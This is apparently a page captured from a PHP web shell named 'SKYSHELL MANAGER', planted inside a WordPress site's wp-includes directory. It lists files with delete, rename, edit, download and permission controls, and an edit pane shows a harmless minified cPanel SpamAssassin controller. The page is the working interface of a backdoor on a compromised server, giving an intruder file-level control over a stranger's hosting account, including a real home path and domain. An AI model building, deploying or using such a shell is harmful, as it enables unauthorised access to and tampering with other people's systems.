📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: spamAutoDelete.min.js
define(["angular","cjt/util/locale","app/services/spamAssassin","cjt/directives/toggleSwitchDirective","cjt/directives/toggleLabelInfoDirective","cjt/directives/actionButtonDirective","cjt/validator/datatype-validators","cjt/directives/validationContainerDirective"],(function(e,t,s){"use strict";return e.module("cpanel.apacheSpamAssassin").controller("spamAutoDelete",["$scope","spamAssassin",function(t,s){var a=s.enableAutoDelete,i=s.disableAutoDelete,n={};n=e.copy(s.spamAssassinSettings),e.extend(t,{spamBoxFeatureEnabled:s.hasFeature("spamBox"),toggleEnable:function(){function e(){n.spam_auto_delete=s.spamAssassinSettings.spam_auto_delete}return n.spam_auto_delete?i().then(e):a(n.spam_auto_delete_score).then(e)},updateSpamScore:function(e){return a(n.spam_auto_delete_score).then((function(){e.$setPristine()}))},settings:n,preferences:s.userPreferences})}])}));
Save